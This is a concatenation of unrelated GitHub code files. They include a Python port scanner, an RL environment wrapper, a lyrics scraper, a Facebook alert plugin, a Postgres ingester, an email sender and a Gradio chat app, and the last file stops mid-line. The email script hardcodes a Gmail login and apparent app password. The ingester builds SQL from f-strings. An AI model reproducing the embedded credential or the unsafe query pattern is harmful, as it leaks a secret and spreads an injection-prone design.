== 0 :\n print(\"Port \" + str(port) + \" is open\")\n s.close()\n\n except socket.gaierror:\n print(\"Can't resolve hostname\")\n sys.exit()\n except OSError:\n print(\"An error ocurred\")\n sys.exit()\n except KeyboardInterrupt:\n print(\"\")\n sys.exit()\n\nports, ip, verbose = process_arguments()\n\n# Default ports to scan\nif not ports:\n ports = [21, 22, 80, 443]\n\nfor p in ports:\n scan_port(ip, p, verbose)\n","repo_name":"joacomi/PortScanner","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16857808961","text":"import numpy as np\r\nimport cv2\r\nfrom collections import deque\r\n\r\nline = np.ones((210,2,3),dtype = np.uint8)\r\nline = line*255\r\ncv2.imwrite(\"data\\images\\line.jpg\",line)\r\nline = cv2.imread(\"data\\images\\line.jpg\")\r\n\r\nclass Env:\r\n def __init__(self,env):\r\n self.env = env\r\n self.observation_space = self.env.observation_space\r\n self.action_space = self.env.action_space\r\n self.buffer = deque(maxlen=4)\r\n self.randomness()\r\n\r\n def randomness(self):\r\n for i in range(4):\r\n self.buffer.append(self.env.reset()[0])\r\n\r\n def reset(self):\r\n reset = self.env.reset()\r\n self.buffer.append(reset[0])\r\n image1 = cv2.hconcat([self.buffer[-4],line,self.buffer[-3]])\r\n image2 = cv2.hconcat([self.buffer[-2],line,self.buffer[-1]])\r\n image = cv2.vconcat([image1,image2])\r\n save = cv2.imwrite(\"data\\images\\concat-image.jpg\",image)\r\n return image\r\n \r\n def render(self):\r\n self.env.render()\r\n\r\n def close(self):\r\n self.env.close()\r\n\r\n def next_state(self,new_state):\r\n self.buffer.append(new_state)\r\n image1 = cv2.hconcat([self.buffer[-4],line,self.buffer[-3]])\r\n image2 = cv2.hconcat([self.buffer[-2],line,self.buffer[-1]])\r\n image = cv2.vconcat([image1,image2])\r\n save = cv2.imwrite(\"data\\images\\concat-next-image.jpg\",image)\r\n return image\r\n \r\n def step(self,action):\r\n 
next_state,reward,done,info,_ = self.env.step(action)\r\n next_state = self.next_state(next_state)\r\n return next_state,reward,done,info","repo_name":"SVISHNUVARDHAN3610/SOFT-ACTOR-CRITIC","sub_path":"Env.py","file_name":"Env.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19835593227","text":"import os\n\nfrom aiohttp import ClientSession\nfrom bs4 import BeautifulSoup\nfrom googlesearch import search\n\nfrom userge import userge, Message, pool\n\n\n@userge.on_cmd(\"glyrics\", about={\n 'header': \"Genius Lyrics\",\n 'description': \"Scrape Song Lyrics from Genius.com\",\n 'usage': \"{tr}glyrics [Song Name]\",\n 'examples': \"{tr}glyrics Swalla Nicki Minaj\"})\nasync def glyrics(message: Message):\n song = message.input_str\n if not song:\n await message.edit(\"Bruh WTF?\")\n return\n await message.edit(f\"__Searching Lyrics For {song}__\")\n to_search = song + \"genius lyrics\"\n gen_surl = list(search(to_search, num=1, stop=1))[0]\n async with ClientSession() as ses, ses.get(gen_surl) as res:\n gen_page = await res.text()\n scp = BeautifulSoup(gen_page, 'html.parser')\n lyrics = await get_lyrics(scp)\n if not lyrics:\n await message.edit(f\"No Results Found for: `{song}`\")\n return\n lyrics = os.linesep.join(lyrics.splitlines())\n title = scp.find('title').get_text().split(\"|\")\n writers = await get_writers(scp) or \"UNKNOWN\"\n lyr_format = ''\n lyr_format += '**' + title[0] + '**\\n\\n'\n lyr_format += '__' + lyrics + '__'\n lyr_format += \"\\n\\n**Written By: **\" + '__' + writers + '__'\n lyr_format += \"\\n**Source: **\" + '`' + title[1] + '`'\n\n if lyr_format:\n await message.edit(lyr_format)\n else:\n await message.edit(f\"No Lyrics Found for **{song}**\")\n\n\n# Added seperate scraping functions to change logic easily in future...\n@pool.run_in_thread\ndef get_lyrics(bs):\n lyrics = bs.find_all(\n \"div\",\n class_=lambda __class: __class and __class.startswith(\"Lyrics__Container\"),\n )\n if not lyrics:\n return None\n for lyric in lyrics:\n for br in lyric.find_all(\"br\"):\n br.replace_with(\"\\n\")\n return \"\\n\".join([x.text for x in lyrics])\n\n\n@pool.run_in_thread\ndef get_writers(bs):\n writers = bs.find(\"div\", class_=\"fognin\")\n if writers.contents[0].extract().text == \"Written By\":\n return writers.text\n return None\n","repo_name":"UsergeTeam/Userge-Plugins","sub_path":"plugins/utils/lyrics/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"52"} +{"seq_id":"26163170030","text":"num = 1024\nprint(hex(num))\n\nnum = 5.23222\nprint(round(num, 2))\n\ns = 'hello how are you Mary, are you feeling okay?'\nprint(s.lower())\n\ns = 'twywywtwywbwhsjhwuwshshwuwwwjdjdid'\nprint(s.count('w'))\n\n\nset1 = {2,3,1,5,6,8}\nset2 = {3,1,7,5,6,8}\n# Find the elements in set1 that are not in set2\nres = set1.intersection(set2)\nprint(res)\n\nres = {x: x**3 for x in range(5)}\nprint(res)\n\nlist1 = [1,2,3,4]\nlist1.reverse()\nprint(list1)\n\n\nlist2 = [3,4,2,5,1]\nlist2.sort()\nprint(list2)","repo_name":"DTL625/udemy-course-code","sub_path":"Complete-Python-Bootcamp/Advance/AdvanceTest.py","file_name":"AdvanceTest.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35137488754","text":"#Setup logging\nimport logging\nlog = 
logging.getLogger(__name__)\n\n#Python Modules\nfrom datetime import datetime\n\n#Local Modules\nfrom ..alarm import Alarm\nfrom ..utils import *\n\n#Exernal Modules\nimport facebook\n\nclass FacebookPages_Alarm(Alarm):\n\n\t_defaults = {\n\t\t'pokemon':{\n\t\t\t'message': \"A wild has appeared! Available until <24h_time> ().\",\n\t\t\t'link': \"\"\n\t\t},\n\t\t'pokestop':{\n\t\t\t'message': \"Someone has placed a lure on a Pokestop! Lure will expire at <24h_time> ().\",\n\t\t\t'link': \"\"\n\t\t},\n\t\t'gym':{\n\t\t\t'message':\"A Team gym has fallen! It is now controlled by .\",\n\t\t\t'link': \"\"\n\t\t}\n\t}\n\n\t#Gather settings and create alarm\n\tdef __init__(self, settings):\n\t\t#Service Info\n\t\tself.page_access_token = settings['page_access_token']\n\t\tself.startup_message = settings.get('startup_message', \"True\")\n\t\tself.startup_list = settings.get('startup_list', \"True\")\n\t\t\t\t\n\t\t#Set Alerts\n\t\tself.pokemon = self.set_alert(settings.get('pokemon', {}), self._defaults['pokemon'])\n\t\tself.pokestop = self.set_alert(settings.get('pokestop', {}), self._defaults['pokestop'])\n\t\tself.gym = self.set_alert(settings.get('gyms', {}), self._defaults['gym'])\n\t\t\n\t\t#Connect and send startup messages\n\t\tself.connect()\n\t\ttimestamps = get_timestamps(datetime.utcnow());\n\t\tif parse_boolean(self.startup_message):\n\t\t\tself.client.put_wall_post(message=\"%s - PokeAlarm has intialized!\" % timestamps[2])\n\t\tlog.info(\"FacebookPages Alarm intialized.\")\n\t\t\n\t#Establish connection with FacebookPages\n\tdef connect(self):\n\t\tself.client = facebook.GraphAPI(self.page_access_token)\n\t\t\t\n\t#Set the appropriate settings for each alert\n\tdef set_alert(self, settings, default):\n\t\talert = {}\n\t\talert['message'] = settings.get('message', default['message'])\n\t\talert['link'] = settings.get('link', default['link'])\n\t\t\t\n\t\treturn alert\n\t\n\t#Post Pokemon Message\n\tdef send_alert(self, alert, info):\n\t\targs = {\n\t\t\t\"message\": replace(alert['message'], info),\n\t\t\t\"attachment\": { \"link\": replace(alert['link'], info) }\n\t\t}\n\t\t\n\t\ttry_sending(log, self.connect, \"FacebookPages\", self.client.put_wall_post, args)\n\t\t\n\t#Trigger an alert based on Pokemon info\n\tdef pokemon_alert(self, pokemon_info):\n\t\tself.send_alert(self.pokemon, pokemon_info)\n\t\n\t#Trigger an alert based on Pokestop info\n\tdef pokestop_alert(self, pokestop_info):\n\t\tself.send_alert(self.pokestop, pokestop_info)\n\t\t\n\t#Trigger an alert based on Gym info\n\tdef gym_alert(self, gym_info):\n\t\tself.send_alert(self.gym, gym_info)","repo_name":"SilverLines/silverLines","sub_path":"alarms/FacebookPages/facebookpages_alarm.py","file_name":"facebookpages_alarm.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74118529764","text":"\nfrom utils.database import Database\nfrom utils.utils import Utils\n\n\nclass StreamIngester(Utils):\n\n def __init__(self, db_connection):\n\n self.db = Database(helpers_connection=db_connection)\n\n def add_target(self, target_data, table_name, output_schema, date_format):\n\n self.target_data = target_data\n\n self.table_name = table_name\n self.schema = output_schema\n\n date_cols = [x['column_name'] for x in self.db.execute_query(f\"\"\" SELECT column_name FROM information_schema.columns WHERE table_schema = '{output_schema}' AND table_name = '{table_name}' AND ( data_type ILIKE '%timestamp%' OR data_type ILIKE '%date%' ); 
\"\"\", return_object=True)]\n\n self.target_data, self.target_columns = Utils.add_missing_keys(self.target_data)\n\n self.column_names = ', '.join(['\"' + x + '\"' for x in self.target_columns])\n self.columns_insert = ', '.join(['%(' + x + ')s' if x not in [k for k in date_cols]\n else f\"TO_TIMESTAMP(%(\" + x + \")s, '\" + date_format + \"')\"\n for x in self.target_columns])\n\n self._ingest_target()\n\n def _ingest_target(self):\n\n self.db.execute_query(f\"\"\" INSERT INTO {self.schema}.{self.table_name}\n ({self.column_names})\n VALUES ({self.columns_insert})\n \"\"\", multiple=True,\n args=self.target_data)\n","repo_name":"danamlewis/open-aps-streaming","sub_path":"data-management-app/utils/stream_ingester.py","file_name":"stream_ingester.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26812197087","text":"#!/usr/bin/env python3\n\nimport xml.etree.ElementTree as ET\nimport yaml\nimport json\nimport sys\nimport re\nimport os\n\nspec = {}\n\ndef printLayers(root, show=[], hide=[], ns={'svg': 'http://www.w3.org/2000/svg','inkscape': 'http://www.inkscape.org/namespaces/inkscape'}, prefix=\"\", autoshow=False):\n if prefix:\n prefix += '/'\n for child in root.findall('./svg:g[@inkscape:groupmode=\"layer\"]', ns):\n label = prefix + child.get(f'{{{ns[\"inkscape\"]}}}label',\"\")\n if autoshow:\n if label in hide:\n child.set('style','display:none')\n print('Hide: ' + label)\n else:\n child.attrib.pop('style',None)\n print('Show: ' + label)\n else:\n if label in hide:\n child.set('style','display:none')\n print('Hide: ' + label)\n elif label in show or 'ALL' in show:\n child.attrib.pop('style',None)\n print('Show: ' + label)\n printLayers(child, show, hide, ns, prefix=label, autoshow=True)\n else:\n child.set('style','display:none')\n print('Hide: ' + label)\n\nif len(sys.argv) != 2:\n print('Usage: ' + sys.argv[0] + \" \")\n exit(1)\n\ntry:\n with open('layouts/' + sys.argv[1],'r') as file:\n spec = json.load(file) # load json specification\n print('Using json')\nexcept json.JSONDecodeError:\n with open('layouts/' + sys.argv[1],'r') as file:\n print('Using yaml')\n spec = yaml.safe_load(file) # load yaml specification\n\nwith open('templates/' + spec['image'],'r') as file:\n ns = dict([ node for _, node in ET.iterparse(file,events=['start-ns'])])\n\nfor prefix in ns:\n ET.register_namespace(prefix,ns[prefix])\n\nroot_tree = ET.parse('templates/' + spec['image']) # load svg\nroot = root_tree.getroot()\n\n\ntry: # set title and version\n root.find('.//svg:text[svg:tspan=\"{{title}}\"]', ns)[0].text = spec.get('title',spec['image'])\n root.find('.//svg:text[svg:tspan=\"{{version}}\"]', ns)[0].text = \"Version: \" + str(spec.get('version',0.1))\n root.find('.//svg:text[svg:tspan=\"{{scale}}\" ]', ns)[0].text = \"Scale 1:\" + str(spec.get('scale',1))\nexcept (IndexError,AttributeError,TypeError):\n pass\n\nwith open('team_names.txt','r') as file:\n team_names = yaml.safe_load(file)\n\nTLA = root.find('svg:g[@inkscape:label=\"TLA\"]',ns) # add team names\nif TLA:\n for team in TLA.findall('.//svg:text/svg:tspan',ns):\n team_no = re.search(r'@T_(\\d+)',team.text)\n if team_no:\n team.text = team_names.get(int(team_no[1]),'')\n\n# set scale\nold_width = root.get('width')[:-2]\nold_height = root.get('height')[:-2]\nroot.set('width',str(float(old_width)/spec.get('scale',1)) + \"cm\")\nroot.set('height',str(float(old_height)/spec.get('scale',1)) + 
\"cm\")\n\nprintLayers(root,spec.get('show',['ALL']),spec.get('hide',[]),ns=ns) # display only selected layers or ALL\n\nfor embedded in spec.get('embed',[]): # add nested svgs (including key)\n print(embedded['image'] + ':')\n embedded_root = ET.parse('templates/' + embedded['image']).getroot() # load svg\n \n TLA = root.find('svg:g[@inkscape:label=\"TLA\"]',ns) # add team names\n if TLA:\n for team in TLA.findall('.//svg:text/svg:tspan',ns):\n team_no = re.search(r'@T_(\\d+)',team.text)\n if team_no:\n team.text = team_names.get(int(team_no[1]),'')\n \n printLayers(embedded_root,embedded.get('show',['ALL']),embedded.get('hide',[]),ns=ns) # display only selected layers or ALL\n \n # add scaled at marker\n embed_parent = root.find('.//svg:rect[@id=\"{}\"]/..'.format(embedded['marker']), ns) # search for marker in id\n if embed_parent is None:\n print('Failed to insert ' + embedded['image'] + ' at ' + embedded['marker'])\n continue # exit(2)\n embed_child = embed_parent.find('./svg:rect[@id=\"{}\"]'.format(embedded['marker']), ns)\n embed_index = list(embed_parent).index(embed_child)\n embedded_root.set('x',embed_child.get('x')) # set x, y, height & width from marker\n embedded_root.set('y',embed_child.get('y'))\n embedded_root.set('width',embed_child.get('width'))\n embedded_root.set('height',embed_child.get('height'))\n embed_parent[embed_index] = embedded_root # replace element with svg\n\nif not os.path.exists('output'):\n os.mkdir('output')\n\nroot_tree.write('output/' + re.sub(r'\\s+','_',spec.get('title','output')) + '.svg',xml_declaration=True,encoding='UTF-8') # save to output\n","repo_name":"srobo/comp-floorplans","sub_path":"2019/generate_svg.py","file_name":"generate_svg.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9545044047","text":"import torch\nfrom pycox.models.utils import pad_col\nfrom torch import nn\nfrom pycox.models.loss import nll_logistic_hazard\n\nclass LossTDSurv(nn.Module):\n def __init__(self, alpha=0.5, beta=1.0):\n super().__init__()\n self.alpha = alpha\n self.beta = beta\n\n def event_time_loss(self, preds, idx_durations):\n \"\"\"\n Event time loss (Note: compute only for uncensored cases)\n \"\"\"\n h = preds[..., 0] # batch_size, time_step\n\n h_l = h.gather(1, idx_durations.unsqueeze(1)).view(-1) # batch_size\n h_padded = pad_col(h, where='start') # batch_size, time_step+1\n conditional_log_haz = torch.zeros_like(h)\n for i, idx in enumerate(idx_durations):\n conditional_log_haz[i, :idx] = torch.log(1 - h_padded[i, :idx])\n\n L_z = -(torch.log(h_l) + conditional_log_haz.sum(1))\n return torch.mean(L_z)\n\n def log_event_rate(self, preds, idx_durations):\n h = preds[..., 0] # batch_size, time_step\n\n h_padded = pad_col(h, where='start') # batch_size, time_step+1\n conditional_surv_log_prob = torch.zeros_like(h)\n for i, idx in enumerate(idx_durations):\n conditional_surv_log_prob[i, :idx] = torch.log(1 - h_padded[i, :idx])\n\n s = conditional_surv_log_prob.sum(1)\n event_rates = torch.clamp(1-s.exp(), min=1e-8)\n log_Wt = torch.log(event_rates)\n return log_Wt\n\n def log_survival_rate(self, preds, idx_durations):\n h = preds[..., 0] # batch_size, time_step\n\n h_padded = pad_col(h, where='start') # batch_size, time_step+1\n conditional_surv_log_prob = torch.zeros_like(h)\n for i, idx in enumerate(idx_durations):\n conditional_surv_log_prob[i, :idx] = torch.log(1 - h_padded[i, :idx])\n log_St = conditional_surv_log_prob.sum(1)\n return 
log_St\n\n def forward(self, preds, target=None):\n\n idx_durations, events = target.T\n idx_durations = idx_durations.long()\n\n L_z = self.event_time_loss(preds[events==1.0], idx_durations[events==1.0])\n\n c = 1.0 - events\n log_St = self.log_survival_rate(preds, idx_durations).squeeze()\n log_Wt = self.log_event_rate(preds, idx_durations).squeeze()\n L_c = -(c * log_St + (1 - c) * log_Wt).mean(dim=0).squeeze()\n\n def inverse_sigmoid(y):\n one_minus_y = (1-y) + 1e-12\n y_ = y + 1e-12\n return torch.log(y_ / one_minus_y)\n\n nll_loss = nll_logistic_hazard(inverse_sigmoid(preds[..., 0]), idx_durations.long(), events.float())\n\n # weighted average of L_z and L_c\n loss = (self.alpha * L_z) + ((1 - self.alpha) * L_c)\n loss += self.beta * nll_loss\n return loss\n","repo_name":"youhs4554/TRANS-TFI","sub_path":"baselines/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14344630732","text":"import smtplib , ssl\nfrom email.mime.text import MIMEText\nfrom email.utils import formataddr\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\ndef send(reciever):\n sender_email = 'harry143lover@gmail.com'\n sender_name = 'SHRESTHA'\n\n # 'kotharisejal1998@gmail.com'\n reciever_email = reciever\n reciever_name = ''\n\n message_body = 'Your Analysis is completed and the Analysed image is attached below..'\n\n\n\n msg = MIMEMultipart()\n msg['To']= reciever_email\n msg['From']=sender_email\n msg['Subject'] = 'Analysed image ' +reciever_name\n\n msg.attach(MIMEText(message_body,'plain'))\n\n filename ='AnalysedImage.png'\n\n try:\n with open(filename,'rb') as attachment:\n part = MIMEBase(\"application\",\"octet-stream\")\n part.set_payload(attachment.read())\n\n #encode file to be sent by email.\n encoders.encode_base64(part)\n\n #add header as key value pair to attachment\n part.add_header('Content-Disposition', 'attachment',\n filename=filename )\n\n msg.attach(part)\n \n except Exception as e:\n print(f'oh no {e}') \n\n\n try:\n conn = smtplib.SMTP('smtp.gmail.com',587)\n\n # send internet traffic\n conn.ehlo()\n context = ssl.create_default_context()\n\n conn.starttls(context=context)\n conn.login(sender_email,'yjjvevhjgndifclw')\n\n conn.sendmail(sender_email,reciever_email,msg.as_string())\n except Exception as e:\n print(f'something bad happened!\\n {e}') \n finally:\n print('server is closing..')\n conn.quit()","repo_name":"ShresthaUpadhyay/SentimentAnalysis-with-emailing","sub_path":"sendMail.py","file_name":"sendMail.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20100958954","text":"from PyPDF2 import PdfReader\nimport gradio as gr\nimport openai\nimport os\n\n # The first line contains the OpenAI key, while the second line provides the OpenAI URL, which is useful when the OpenAI server is hidden behind a proxy server.\n # eg. 
first line \"sk-xxxxxxxxxx\", second line \"http://PROXY-URL\"\nif os.path.isfile('config'):\n config = open(\"config\").readlines()\nelse:\n config = \"\"\napi_key_from_config = \"\"\nif len(config) > 0 and len(config[0].strip()) > 0:\n api_key_from_config = config[0].strip()\nif len(config) > 1 and len(config[1].strip()) > 0:\n openai.api_base = config[1].strip()\n\n# config\nDEBUG = True\n\n'''\n gradio: [['first question', 'No'], ['second question', 'Yes']]\n openai: [{\"role\": \"user\", \"content\": \"first question\"}, {\"role\": \"assistant\", \"content\": \"No\"}\n {\"role\": \"user\", \"content\": \"second question\"}, {\"role\": \"assistant\", \"content\": \"Yes\"}]\n'''\ndef gradio_messages_to_openai_messages(g):\n result = []\n for pair in g:\n result.append({\"role\": \"user\", \"content\": pair[0]})\n result.append({\"role\": \"assistant\", \"content\": pair[1]})\n return result\n\ndef respond(chat_history, message, system_message, key_txt, url_txt, model, temperature):\n messages = [\n {\"role\": \"system\", \"content\": system_message},\n *gradio_messages_to_openai_messages(chat_history),\n {\"role\": \"user\", \"content\": message}\n ] \n openai.api_key = key_txt if key_txt else api_key_from_config\n if url_txt:\n openai.api_base = url_txt\n if DEBUG:\n print(\"messages:\", messages)\n print(\"model:\", model)\n print(\"temperature:\", temperature)\n completion = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n )\n if DEBUG:\n print(\"completion:\", completion)\n response = completion['choices'][0]['message']['content']\n result = chat_history + [[message, response]]\n return result\n\n# The parse_pdf function is responsible for parsing the text from a PDF file and using it as input for the OpenAI GPT model.\n# Parameters:\n# - prompt: The initial prompt for the GPT model.\n# - pdfs: The PDF files to be parsed.\n# - system_message: The initial system message for the GPT model.\n# - key_txt: The OpenAI API key.\n# - url_txt: The OpenAI API base URL.\n# - model: The GPT model to be used.\n# - temperature: The temperature for the GPT model's output.\ndef parse_pdf(prompt, pdfs, system_message, key_txt, url_txt, model, temperature):\n result = \"\"\n full_text = \"\"\n # Iterate over each PDF file\n for pdf in pdfs:\n print(\"parse: \", pdf)\n text = \"\"\n # Use PdfReader to read the PDF file\n reader = PdfReader(pdf.name)\n # Iterate over each page in the PDF file and extract the text\n for page in reader.pages:\n text = text + page.extract_text()\n # Add a separator between the text from different PDF files\n full_text += text + \"\\n----------\\n\"\n # Construct a list of messages for the GPT model\n messages = [\n {\"role\": \"system\", \"content\": system_message},\n {\"role\": \"user\", \"content\": prompt + \"\\n\\n###\\n\\n \" + full_text}\n ]\n # Set the OpenAI API key and base URL\n openai.api_key = key_txt if key_txt else api_key_from_config\n if url_txt:\n openai.api_base = url_txt\n if DEBUG:\n print(\"messages:\", messages)\n print(\"model:\", model)\n print(\"temperature:\", temperature)\n # Use the openai.ChatCompletion.create method to generate a response from the GPT model\n completion = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n )\n if DEBUG:\n print(\"completion:\", completion)\n # Extract the response from the completion\n response = completion['choices'][0]['message']['content']\n\n return response\n\nwith gr.Blocks() as demo:\n with gr.Tab(\"Config\"):\n 
with gr.Row():\n key_txt = gr.Textbox(label = \"Openai Key\", placeholder=\"Enter openai key 'sk-xxxx'%s\" %\n (\", Leave empty to use value from config file\" if api_key_from_config else \"\"))\n url_txt = gr.Textbox(label = \"Openai API Base URL\", placeholder=\"Enter openai base url 'https://xxx', Leave empty to use value '%s'\" % openai.api_base)\n system_message = gr.Textbox(label = \"System Message:\", value = \"You are an assistant who gives brief and concise answers.\")\n model = gr.Dropdown(label=\"Model\", choices=[\"gpt-3.5-turbo\", \"gpt-3.5-turbo-0301\", \"gpt-4\"], multiselect=False, value=\"gpt-3.5-turbo\", type=\"value\")\n temperature = gr.Slider(0, 2, value=1, label=\"Temperature\", step=0.1, info=\"What sampling temperature to use, between 0 and 2. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic.\")\n with gr.Tab(\"Chat\"):\n gr.Markdown(\"## Chat with GPT\")\n chatbot = gr.Chatbot()\n message = gr.Textbox(label = \"Message:\", placeholder=\"Enter text and press 'Send'\")\n message.submit(\n respond,\n [chatbot, message, system_message, key_txt, url_txt, model, temperature],\n chatbot,\n )\n with gr.Row():\n clear = gr.Button(\"Clear\")\n clear.click(lambda: None, None, chatbot)\n send = gr.Button(\"Send\")\n send.click(\n respond,\n [chatbot, message, system_message, key_txt, url_txt, model, temperature],\n chatbot,\n )\n with gr.Tab(\"PDF\"):\n gr.Markdown(\"## Parse PDF with GPT\")\n prompt = gr.Text(label=\"Prompt\")\n pdfs = gr.File(label=\"Upload PDF\", file_count=\"multiple\", file_types=[\".pdf\"])\n markdown = gr.Markdown(label=\"Output\")\n with gr.Row():\n clear = gr.Button(\"Clear\")\n clear.click(lambda: None, None, markdown)\n submit = gr.Button(\"Upload\")\n submit.click(\n parse_pdf,\n [prompt, pdfs, system_message, key_txt, url_txt, model, temperature],\n markdown\n )\n\n\nif __name__ == \"__main__\":\n demo.launch()\nelse:\n # run with \"gradio app.py\"\n demo.launch(server_name=\"0.0.0.0\")","repo_name":"simpx/chatdemo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"6458451789","text":"n = int(input())\r\nc = 0\r\ns = 0\r\nlista = \"\"\r\nwhile True:\r\n if c == n: break\r\n x, y = map(int, input().split())\r\n if x > y:\r\n for i in range(y+1,x):\r\n if i%2==1:\r\n s+=i\r\n elif x < y:\r\n for i in range(x+1,y):\r\n if i%2==1:\r\n s+=i\r\n elif x == y:\r\n s=0\r\n lista += str(s)+'\\n'\r\n c+=1\r\n s=0\r\nprint(lista.rstrip())","repo_name":"Gefft3/ProblemasBeecrowd","sub_path":"beecrowd/1099.py","file_name":"1099.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38072480419","text":"formula = input()\nstack = []\nresult = ''\n\n# 연산자 우선순위\ndef p(opr):\n if opr == '+' or opr == '-':\n return 1\n elif opr == '*' or opr == '/':\n return 2\n else:\n return 0\n\n\nfor i in formula:\n if i.isalpha():\n result += i\n continue\n if i == '(':\n stack.append(i)\n elif i == ')':\n while(True):\n if stack and stack[-1] != '(':\n result += stack.pop()\n else:\n stack.pop()\n break\n else:\n while(True):\n if stack and (p(stack[-1]) >= p(i)):\n result += stack.pop()\n else:\n stack.append(i)\n break\n\nwhile(True):\n if stack:\n result += stack.pop()\n else:\n 
break\n\nprint(result)","repo_name":"hyeonn/algorithm-study","sub_path":"baekjoon/postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8196245592","text":"from django.shortcuts import render, redirect\nfrom .models import Page\nfrom task.models import Task\nfrom django.contrib.auth import authenticate, login as l\nfrom django.contrib import messages\nfrom django.urls import reverse\nfrom account.models import create_client_if_not_exist\nfrom support.settings import MOBILE_URL\nfrom account.models import Client\nfrom django.http import HttpResponse\n# Create your views here.\n\nwelcome_message = '''Для подключения бота необходимо указать логин в телеграмме и нажать кнопку \"Сохранить!\" '''\n\ndef get_script(request,site,lang):\n if(request.META['REMOTE_HOST']):\n print(request.META['REMOTE_HOST'])\n # create_client_if_not_exist(request.META['REMOTE_HOST'])\n #print(request.META['REMOTE_HOST'])\n try:\n cl = Client.objects.get(alias=site)\n context = {'site': site, 'lang': lang, 'mobile_url': MOBILE_URL, 'client_sign': cl.sign}\n return render(request,'script.js',context)\n except Exception as e:\n mes = str(e) \n print(mes)\n return HttpResponse('alert(\"%s\")' % mes)\n\n\ndef index(request):\n page = Page.objects.get(name_slug='index')\n tasks = []\n if request.user.is_authenticated:\n #tasks = Task.objects.filter(user=request.user).order_by('-is_active','-id')\n tasks = Task.objects.all().order_by('-is_active','-id')\n #if not request.user.profile.telegram_login:\n # messages.warning(request, welcome_message)\n # return redirect('profile')\n else:\n messages.warning(request, 'Нужно авторизоваться!')\n messages.success(request, 'Для входа используйте
гугл аккаунт' % reverse('social:begin', args=['google-oauth2']) )\n return render(request,'main/index.html',{'page': page, 'tasks': tasks})\n\n\n\ndef login(request):\n username = request.POST['login']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n l(request, user)\n return redirect('home')\n else:\n messages.warning(request, 'Error!!!!')\n return redirect('home')\n\ndef logoutme(request):\n logout(request)\n return redirect('home')\n","repo_name":"zdimon/support-ionic-django","sub_path":"support/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44565406046","text":"import os\nfrom datetime import datetime\nfrom config import db\nfrom models import Person, Note\n\n# Данные для инициализации базы данных\nPEOPLE = [\n {\n \"fname\": \"Doug\",\n \"lname\": \"Farrell\",\n \"notes\": [\n (\"Круто, приложение для мини-блогов!\", \"2019-01-06 22:17:54\"),\n (\"Это может быть полезно\", \"2019-01-08 22:17:54\"),\n (\"Ну вроде полезно\", \"2019-03-06 22:17:54\"),\n ],\n },\n {\n \"fname\": \"Kent\",\n \"lname\": \"Brockman\",\n \"notes\": [\n (\n \"Я собираюсь сделать действительно глубокие наблюдения\",\n \"2019-01-07 22:17:54\",\n ),\n (\n \"Может быть, они будут более очевидными, чем я думал\",\n \"2019-02-06 22:17:54\",\n ),\n ],\n },\n {\n \"fname\": \"Bunny\",\n \"lname\": \"Easter\",\n \"notes\": [\n (\"Кто-нибудь видел мои пасхальные яйца?\", \"2019-01-07 22:47:54\"),\n (\"Я действительно опоздал с доставкой!\", \"2019-04-06 22:17:54\"),\n ],\n },\n]\n\n# Удалите файл базы данных, если он существует в данный момент\nif os.path.exists(\"people.db\"):\n os.remove(\"people.db\")\n\n# Создание базы данных\ndb.create_all()\n\n# Выполните итерацию по структуре людей и заполните базу данных\nfor person in PEOPLE:\n p = Person(lname=person.get(\"lname\"), fname=person.get(\"fname\"))\n\n # Добавьте заметки для этого человека\n for note in person.get(\"notes\"):\n content, timestamp = note\n p.notes.append(\n Note(\n content=content,\n timestamp=datetime.strptime(timestamp, \"%Y-%m-%d %H:%M:%S\"),\n )\n )\n db.session.add(p)\n\ndb.session.commit()","repo_name":"thr4sh/flaskstuff","sub_path":"build_database.py","file_name":"build_database.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70585355364","text":"import logging\n\nimport ltr559\nfrom blinker import signal\n\n\nclass LTR559:\n def __init__(self, address):\n logging.info('Initialising LTR559 sensor with address {}'.format(address))\n self._sensor = ltr559.LTR559()\n\n def get_lux(self):\n \"\"\"\n Return measured lux from the sensor.\n\n :return:\n \"\"\"\n logging.debug('Measuring lux')\n lux = self._sensor.get_lux()\n logging.info('Broadcasting 